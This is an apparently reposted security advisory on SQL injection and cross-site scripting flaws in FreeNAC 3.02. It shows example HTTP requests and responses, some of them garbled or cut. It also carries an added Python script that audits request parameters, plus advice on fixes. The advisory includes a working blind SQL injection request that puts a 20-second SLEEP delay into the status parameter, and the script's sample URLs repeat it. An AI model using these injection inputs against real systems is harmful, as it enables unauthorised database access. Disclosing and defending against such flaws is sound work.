FreeNAC v3.02 SQL Injection and XSS Flaws and Fixes: Vulnerability Alert - Computer Resources

Computer Resources  Date: 2019-01-01
[www.unjs.com - Computer Resources]

   

    FreeNAC version 3.02 SQL Injection and XSS Vulnerabilities

    Author: Blake

    Software link: http://sourceforge.net/project/showfiles.php?group_id=170004

    Affected version: 3.02

    Tested on: Ubuntu 8.04 (freenac version 3.02 vmware appliance)

    FreeNAC provides Virtual LAN assignment, LAN access control (for all kinds of network devices such as servers, workstations, printers, IP phones ...), and live network end-device discovery. Both 802.1x and Cisco's VMPS port security modes are supported. VLAN and switch port management and documentation of patch cabling are also included.

    Reflected XSS:

    Multiple parameters are vulnerable to reflected cross-site scripting.

    Affected Parameters:

    comment

    mac

    graphtype

    type

    name

    Example Request:

    GET /stats.php?graphtype=bar&type=vlan13

    Host: 192.168.1.118

    User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0

    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

    Accept-Language: en-us,en;q=0.5

    Accept-Encoding: gzip, deflate

    DNT: 1

    Proxy-Connection: keep-alive

    Referer: http://www.xxxx.com /stats.php?graphtype=bar&type=switch

    Cookie: freenac=92bcf3d911d94e33106c2e79745e8e8e

    Example Response:

    HTTP/1.1 200 OK

    Date: Sat, 19 May 2012 17:42:41 GMT

    Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5 with Suhosin-Patch

    X-Powered-By: PHP/5.2.4-2ubuntu5

    Expires: Thu, 19 Nov 1981 08:52:00 GMT

    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

    Pragma: no-cache

    Content-Length: 5676

    Content-Type: text/html

   

    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

   


   

    ..........snip......................

   

   
 

    Database error

    Please go back to the previous screen, or the Main Menu and start again, or try again later.

    Stored XSS:

    The comment parameter is vulnerable to stored cross-site scripting.

    Example:

   

    http://www.2xxxx.com /deviceadd.php?name=test&mac=0001.0001.0001&status=1&vlan=6&username=2&office=1&comment=">&action=Update&action_idx=1

    Example Response:

    HTTP/1.1 200 OK

    Date: Sat, 19 May 2012 17:53:38 GMT

    Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5 with Suhosin-Patch

    X-Powered-By: PHP/5.2.4-2ubuntu5

    Expires: Thu, 19 Nov 1981 08:52:00 GMT

    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

    Pragma: no-cache

    Content-Length: 6945

    Content-Type: text/html

   

    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

   


   

    .............snip.................

   

    Switch:

    , port= , location= 

   

    Comment:

    "/>

    Last IP:NONE

   

   

   

   

    onClick="javascript:return confirm('Really DELETE this end-device record?')"

    />

    '

   

   

    Administrative information

    Inventory:

    Classification:

    ............snip....................

    ========

    SQL Injection:

    The status parameter is vulnerable to blind SQL Injection.

    Injecting a time-delay of 20 seconds:

    http://192.168.1.118/deviceadd.php?name=test&mac=0001.0001.0001&status=1+AND+SLEEP(20)&vlan=6&username=2&office=1&comment=&action=Update&action_idx=1
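    The following input check is an added example, not part of the original advisory and not FreeNAC code. It audits request URLs for the parameters the advisory names: `status` must be an integer, and the XSS-affected parameters must match an expected shape or contain no markup characters. The value shapes are assumptions inferred from the advisory's example requests, and the sample URLs are constructed from them.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Value shapes inferred from the advisory's example requests (assumptions,
# not FreeNAC's documented schema).
STRICT = {
    "status":    re.compile(r"\d+"),                      # blind SQLi parameter
    "mac":       re.compile(r"(?:[0-9A-Fa-f]{4}\.){2}[0-9A-Fa-f]{4}"),
    "graphtype": re.compile(r"[A-Za-z]+"),
    "type":      re.compile(r"[A-Za-z0-9_]+"),
}
# Free-text parameters from the affected list: only markup characters are flagged.
FREE_TEXT = {"comment", "name"}
MARKUP = re.compile(r"[<>\"']")


def audit_request(url):
    """Return sorted (parameter, reason) findings for one request URL."""
    findings = set()
    query = urlsplit(url).query
    # parse_qs percent-decodes and turns '+' into a space, so the check sees
    # the value the application would see.
    for param, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            if param in STRICT and not STRICT[param].fullmatch(value):
                findings.add((param, "unexpected format"))
            elif param in FREE_TEXT and MARKUP.search(value):
                findings.add((param, "markup characters"))
    return sorted(findings)


# Constructed sample requests modelled on the URLs in the advisory.
SAMPLES = [
    "/stats.php?graphtype=bar&type=vlan13",
    "/deviceadd.php?name=test&mac=0001.0001.0001&status=1+AND+SLEEP(20)"
    "&vlan=6&username=2&office=1&comment=&action=Update&action_idx=1",
    "/deviceadd.php?name=test&mac=0001.0001.0001&status=1&vlan=6"
    "&username=2&office=1&comment=%22%3E&action=Update&action_idx=1",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample.split("?")[0], audit_request(sample))
```

    Input checks like this supplement, and do not replace, parameterized queries for `status` and HTML encoding on output for the reflected and stored parameters.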
